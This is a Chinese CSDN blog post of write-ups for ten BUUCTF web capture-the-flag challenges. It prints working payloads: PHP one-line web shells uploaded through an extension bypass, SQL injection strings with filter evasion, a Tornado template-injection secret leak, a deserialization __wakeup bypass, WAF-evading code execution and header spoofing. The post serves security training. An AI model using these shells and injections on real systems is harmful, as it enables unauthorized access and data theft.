BUUCTF——Web1

已于 2023-07-17 19:19:47 修改
阅读量844 收藏 6
点赞数 1
分类专栏: BUUCTF 文章标签: 安全 网络安全
于 2023-07-17 19:12:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75331136/article/details/131684029
版权

一、[极客大挑战 2019]Http

打开靶机,出现以下页面

查看源代码

 发现Secret.php,访问后出现以下页面

 接着我们使用bp进行抓包

 在请求头中添加

Referer:https://Sycsecret.buuoj.cn

字段发送请求,出现以下页面 

根据提示更改User-Agent为

User-Agent: Syclover

发送请求,出现以下页面 

提示要是来自本地的访问请求,联想到127.0.0.1,需要

X-Forwarded-For: 127.0.0.1 

X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。

出现flag

 flag为

flag{8121414c-8ed4-490e-9d34-351f08b4504b}

 二、[极客大挑战 2019]Knife

打开靶机,出现以下页面

 使用菜刀进行连接

连接成功后,在/flag目录下获得flag

 flag为

flag{b8b99cdb-fdac-4ce1-bec1-d647e1ee47bb}

同理可得,也可用蚁剑进行此操作 

三、[极客大挑战 2019]Upload

打开靶机,出现以下页面

 首先我们尝试上传木马文件

<?php @eval($_POST['yy']); ?> 

我们先将一句话木马写在记事本后,将后缀名改为.jpg 

 提交后出现以下页面,不能含有<?,看来是被过滤了

我们尝试换个一句话木马上传

GIF89a
<script language="php">eval($_POST['shell']);</script> 

再次上传后出现以下页面,说明上传成功

 接着我们进行抓包

 经过多次尝试我们发现,文件的后缀不能为php,文件绕过的格式也有很多格式php,php3,php4,php5,phtml,但是经过尝试后发现只有.phtml此后缀名可绕过,其余均无法绕过,所以我们将上传文件yy.jpg的后缀改为phtml

 查看/upload

找到我们上传的文件yy.phtml

查看/upload/yy.phtml

 

使用蚁剑进行连接,连接成功后

在/flag目录下找到flag

flag为

flag{27541e51-6965-4231-89b8-e9071b3b8b46} 

 四、[护网杯 2018]easy_tornado

打开靶机,出现以下页面

挨着点击三个文件查看

/flag.txt

/welcome.txt 

render()是tornado里的函数,可以生成html模板。是一个渲染函数 ,就是一个公式,能输出前端页面的公式。 tornado是用Python编写的Web服务器兼Web应用框架

  /hints.txt

 /file?filename=/fllllllllllllag&filehash={{1}}

模板注入必须通过传输型如{{xxx}}的执行命令

 通过msg拿到cookie_secret的值

/error?msg={{handler.settings}}

 

提示信息,得到cookie_secret:750eeb79-5711-4775-8086-ed342d0f6b67

然后结合md5(cookie_secret+md5(filename))

即md5('750eeb79-5711-4775-8086-ed342d0f6b67'+md5('/fllllllllllllag'))

filename=/fllllllllllllag的md5:3bf9f6cf685a6dd8defadabfb41a03a1

/file?filename=/fllllllllllllag&filehash=5c912c00167c1f6003856e86486e3622

 出现flag

 flag为:

flag{98c1fb2f-e79a-45d5-8d86-dfef15dbc063}

五、[极客大挑战 2019]BabySQL

 打开靶机,出现以下页面

我们看到这类题首先想到使用万能密码,出现以下页面 

/check.php?username=admin' or '1'='1&password=1

 or关键字被过滤,尝试使用双写进行绕过

/check.php?username=admin' %23&password=1

 接着进行常规的sql注入,这里先进行爆库 

 /check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,database() %23

查找库

/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23

 看到ctf后,我们猜想flag在里面,因此我们尝试将其进行爆破

出现flag字样,为查找里面相应的数据,我们将其进行爆破

/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag) %23 

 出现flag

 flag为:

flag{16a4f98d-23f1-4ad1-ae30-d4de7babfac9}

 六、[极客大挑战 2019]PHP

打开靶机,出现以下页面

提示备份网站,直接扫描目录,得到www.zip
解压得到class.php,index.php,flag.php等源码 

首先我们将flag.php打开查看一下,没有flag,我们将其他几个文件也进行查看

 在index.php文件中发现代码第39行unserialize可能存在反序列化漏洞

 序列化:函数为serialize(),把复杂的数据类型压缩到一个字符串中 数据类型可以是数组,字符串,对象等
反序列化:函数为unserialize(),将字符串转换成变量或对象的过程
常用的内置方法:
__construct():创建对象时初始化,当一个对象创建时被调用
__wakeup() 使用unserialize时触发
__sleep() 使用serialize时触发
__destruction():结束时销毁对象,当一个对象销毁时被调用

 在class.php文件中发现代码中含有__destruct,__construct,__wakeup可以判断存在反序列化漏洞

 执行__destruct()时会输出flag,那么我们需要一个Name对象,所以我们传递一个Name对象序列化后的值
根据__destruct()可以得知,属性password==100,username===admin时可以得到flag

<?php
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin',100);
echo(serialize($a));
?>

 通过运行得到序列化后的字符串

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 

__wakeup()会将username重新赋值为“guest”,所以我们需要想办法将__wakeup()函数绕过。在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行

原本:O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
绕过:O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

在序列化字符串中,私有属性前其实是有两个’\0’的,分别在类名前和属性名前,比如在vscode里执行这段序列化代码就会出现显示不全的情况,所以我们在传参时要加上’%00’

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

 出现flag

 flag为:

flag{4c1b5bd0-9506-451e-9792-5a43a4273914}

 七、[ACTF2020 新生赛]BackupFile

打开靶机,出现以下页面 

 查看源码后,发现并没有什么,但是我们根据题目Backup file,翻译成中文就是备份文件的意思

通个扫描发现备份文件/index.php.bak,下载该备份文件信息后,打开发现是源码

 include_once "flag.php";:包含flag文件
$key = $_GET['key'];:需要一个参数key
if(!is_numeric($key)):对key做过滤,
is_numeric:如果指定的变量是数字和数字字符串则返回 TRUE,否则返回 FALSE,注意浮点型返回 1,即 TRUE。
if($key == $str):将key和str做个了比较,这里是弱类型比较。
如果key为数字时,在做==比较时,str字符串自动变为数字,即str=123

要求GET方式传递一个Key值,并且Key必须为数字且等于123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3这一字符串

感觉是考PHP的弱类型特性,int和string是无法直接比较的,php会将string转换成int然后再进行比较,转换成int比较时只保留数字,第一个字符串之后的所有内容会被截掉

根据上述条件,构造出payload:

/index.php?key=123

 出现flag

flag为:

flag{4045b91f-9e38-4715-ad81-912ee1656071} 

八、[RoarCTF 2019]Easy Calc 

打开靶机,出现以下页面

 我们打开源代码

尝试访问这个calc.php,发现多行匹配过滤了一部分特殊符号,但是实际访问时,发现字母全部被拦截了,看来是上了层WAF

绕过waf对num的检测,(num前面需要加上空格)

利用PHP的字符串解析特性

/calc.php? num=phpinfo() 

成功绕过waf,对于waf的绕过,由于php在执行的时候会自动忽略掉空格字符,包含换行回车等,而waf不可以,所以可以构造一个payload为 

利用scandir()列出目录和文件,var_dump()用于输出

/calc.php? num=var_dump(scandir(chr(47)))

var_dump() 函数用于输出变量的相关信息。 var_dump() 函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。

var_dump()相当于echo

scandir()扫描目录下的文件,scandir(/)相当于ls /

chr(47) 是  /  的ASCII编码

尝试访问flag文件,出现flag

一、利用file_get_contents()读取并输出文件内容

/calc.php/=chr(47),f=chr(102),l=chr(49),a=chr(97),g=chr(103),g=chr(103) ? num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))); 

二、 

/calc.php? num=var_dump(include(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) 

flag为:

flag{fb285683-4047-44a0-a696-b46023eb42d2} 

九、[极客大挑战 2019]BuyFlag 

打开靶机,出现以下页面

查看源代码,出现两个php(index.php,pay.php)

 index.php

  pay.php

 查看源代码

提示money=100000000,password == 404

is_numeric来判断password是否为数字或数字字符串,导致我们给password传入的参数只能为字符串类型的

is_numeric()函数检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False

$password == 404,在PHP中==是一种弱类型比较,即只取字符串中开头的整数部分进行比较。

必须提交money和password 两个参数

password不可以为纯数字,但是它要与404相等

isset()函数是用来检验变量是否被设置的

 使用bp抓包

 变更请求方法

将Cookie:user=0改为1,表示是学生

然后添加money和password的值
password=404 &money=100000000

password=404a或password = 404%20(相当于在404后面加了一个空格,其他空白字符也可以绕过)就可以了,既绕过了is_numeric()又完成了password的匹配

 回显数字太长,就换一个表示方式

1、科学计数法绕过money=1e9

2、数组绕过money[]=1

出现flag

flag为:

flag{c8729030-540e-4306-878b-d5ced3d0ce6c} 

 十、[BJDCTF2020]Easy MD5

打开靶机,出现以下页面

使用bp进行抓包,出现提示

Hint: select * from 'admin' where password=md5($pass,true)

md5(string,raw)

string:必需,要计算的字符串

raw:可选

         默认不写为FALSE。32位16进制的字符串

         TRUE。16位原始二进制格式的字符串

 Hint是md5类型的sql注入

password经过md5加密,有true参数以字符串形式显示出来

首先我们要找到一个字符串,这个字符串经过md5得到的16位原始二进制的字符串能帮我们实现sql注入

取32位16进制的md5值里带有276f7227这个字段的

ffifdyop经过md5加密后为276f722736c95d99e921722cf9ed621c

ffifdyop经过md5加密后,使用hex解码可以转换为'or'

MySQL默认将十六进制数转换为hex()

..md5的强连接和弱连接使用数组绕过

 输入框内输入ffifdyop

 出现以下页面

进行抓包或者是查看源代码,出现以下内容

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

根据返回的信息的提示,需要绕过的是md5的弱等于,它的要求是变量1和变量2要求不相等,然而,通过md5加密后的结果要进行相等
使用数组进行绕过

 /levels91.php?a[]=1&b[]=2 

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

 使用数组绕过

param1[]=1&param2[]=2

 变更请求方法,出现flag 

双等号(==):两个等号称为等值符,当等号两边的值为相同数据类型时,直接比较值是否相同,当类型不同时会发生数据类型的转换,转换为相同的类型后再进行比较。(通常在if判断语句中使用) 

 (1)如果等号两边是boolean、string、number三者中任意两者进行比较时,优先转换为数字进行比较。

( 2)如果等号两边出现了null或undefined,null和undefined除了和自己相等,就彼此相等

三等号(===):三个等号称为绝对等同符,既要判断数值也要判断数据类型是否相等,当等号两边的值为相同数据类型时,直接比较等号两边的值,值相同则返回true;若等号两边的值类型不同时直接返回false。

flag为:

flag{80ec0969-e689-4639-b761-becb307188af} 

Yyia123
关注
专栏目录
BUUCTF Web1
ookami6497的博客
12-11 936
BUUCTF——Web
2201_75331136的博客
07-11 1085
启动靶机,出现这个用户登录页面 随便输入一个用户名和密码,通过网址可以判断出该请求方式使用万能密码测试是否存在SQL注入漏洞登录后便可查看到flagflag为:启动靶机,出现以下页面 查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了 源码中 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置 得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.ph
BUUCTF WEB 1
weixin_45689999的博客
04-06 542
easy_sql 题目提示是简单sql注入,可以先试试过滤了什么 1’ or ‘1’=‘1# 1’ and 1=1# 没有报错,证明or,and和#都没有被过滤 2)爆字段数 1’order by 2# 1’order by 3#报错 3)爆库 1’ union select database()# 返回return preg_match("/select|update|delete|drop|...
BUUCTF——Web_buuctfweb
最新发布
2401_86640747的博客
09-07 655
登录后便可查看到flagflag为:启动靶机,出现以下页面查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了源码中 给出了 两个文件,还有一个 **hint.php,**这里给出了flag的位置得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.php,flag应该就在这个php文件中文件名为flag.php,那么flag应该就存在于此文件中,但是我们f12并没有查看到
buuctf web1
qq_61768489的博客
03-11 3295
[极客大挑战 2019]EasySQL [HCTF 2018]WarmUp <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; ...
[BuuCTF]Web-1
Anonymous
01-05 1041
1.随便注 堆叠注入: 1;show databases;# 1;show tables;# 1;show columns from [tablename];# 通过堆叠注入查看表中数据: 1';PREPARE test from concat('s','elect','* from `1919810931114514`**');EXECUTE test;#** 1';PREPARE w from concat(char(115,101,108,101,99,116),' * from `191
BUUCTF web(一)
m0_46616663的博客
10-19 1718
[强网杯 2019]随便注 方法一 查询的过程中发现有过滤 尝试以下报错注入,用到了extractvalue() 简单讲一下extractvalue()。语法:extractvalue(目标xml文档,xml路径),路径为/xx/xx/…,如果路径非法就会报错并且返回非法内容,所以我们正可以借此查询到目标内容,用concat()拼接‘/’也是一样的,但是拼接‘~’就不合法了: 1’ and extractvalue(1,concat(’~’,database()))# 最长32位哈,超过32用subst
2024年网络安全最新Buuctf-Web-[极客大挑战 2024]EasySQL 1 题解及思路总结
2401_84264096的博客
05-03 1185
例如输入1)、1"、1-等,这些数字后面的字符不是闭合符,所以数据库会把这些输入的错误数据转换成正确的数据类型。但是,若输入的数字后面的字符恰好是闭合符,则会形成闭合。原理:当闭合字符遇到转义字符时,会被转义,那么没有闭合符的语句就不完整了,就会报错,通过报错信息我们就可以推断出闭合符。时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号。分析报错信息:看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。可知此页面与数据库产生交互。
BUUCTF-WEB
ccfly1012的博客
11-02 3923
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
Buuctf-Web-[极客大挑战 2024]EasySQL 1 题解及思路总结(1)
2401_84281594的博客
04-28 813
(但是在本题中有两个变量,这个方法不太适用)
buuctf——[第五空间2019 决赛]PWN51 利用格式化字符串漏
2301_81505831的博客
03-15 478
首先,我们在终端上输入 ./pwn,然后利用AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x的形式来计算偏移量:可以数出0x41414141是格式化字符串的第10个参数,之后只要修改dword_804c044的值,让输入和dword_804c044的值一样就可以了。打开靶机,下载文件,检查文件类型,可以看到是32位程序,开启了Canary保护,不能使用栈溢出。放进ida32位可以看到如下代码。最后的最后,附带一些参考博客。用gpt分析以上程序。最后我们便得出了代码。
buuctf-Web1
m0_62094846的博客
04-09 4008
在登陆界面用sql注入的各种手段都没用,注册进去看看 抓包后发现数据包有点像xss,也能使它弹窗,但是好像没什么用 用标题1' 会有关于sql语句的弹窗(但是如果抓包就不会出现) 也能说明是单引号闭合(1"就不行,能知道是sql注入也不容易) 闭合语句的时候出了问题(1'#,1'--+) 1'%23不会被过滤,但是好像起不到闭合的作用 有一个小细节之前一直忘记了: 用#闭合的是后面的内容,而这道题需要闭合的后面的内容就是单引号,所以后面加一个单引号就行 1''..
BUUCTF[Web 1](SQL注入1)
夜思红尘的博客
06-22 377
这里是关于网络安全之SQL注入的练习,这里SQL是一个十分危险的漏洞,因此我们要注重有关于SQL注入的防御,同时欢迎大家前来阅读!
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 5778
BUUCTF--Web篇详细wp。
buuctf Web
梦里明明有六趣,觉后空空无大千
02-17 777
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
web-ctfctf_BUUCTF_web(1)
一个努力生活的人的博客
11-20 2180
ctf_BUUCTF_web
BUUCTF:[SWPU2019]Web1
qq_46230755的博客
12-27 526
一个登录页面,先去试着注册一个账号 老样子试图注册admin,发现用户已存在 那先随便注册个123 123进去 然后申请一下发布广告 发现实现了一个留言板的功能,考虑一下有没有存在注入的可能。 申请一个1’发现存在着回显 fuzz一下,可以发现过滤挺多东西的。比如空格我们可以用/**/替代导致无法使用information_schema库,我们可以通过无列名注入 构造payload -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14.
BUUCTF: [SWPU2019]Web1
末初的CSDN博客
09-25 775
登录注册、在测试的时候发现发布中的广告名如果输入一些敏感关键字,例如。但是因为没有字段信息可以查,使用无列名注入直接查内容。然后再之后的对广告名的fuzz测试中发现以下过滤。猜测广告名存在注入,尝试在广告名处输入单引号。,发布的时候并没有任何反应,发布后有个。尝试联合查询、首先需要判断有多少字段,直接报错了,基本确定广告名存在。无法注释就尝试构造闭合。可以查看发布的广告。查表明,因为这里过滤。
BUUCTF-Web题目1
weixin_54055099的博客
06-14 335
BUUCTF的一些题目
buuctf web
08-15
- *1* [【CTFbuuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值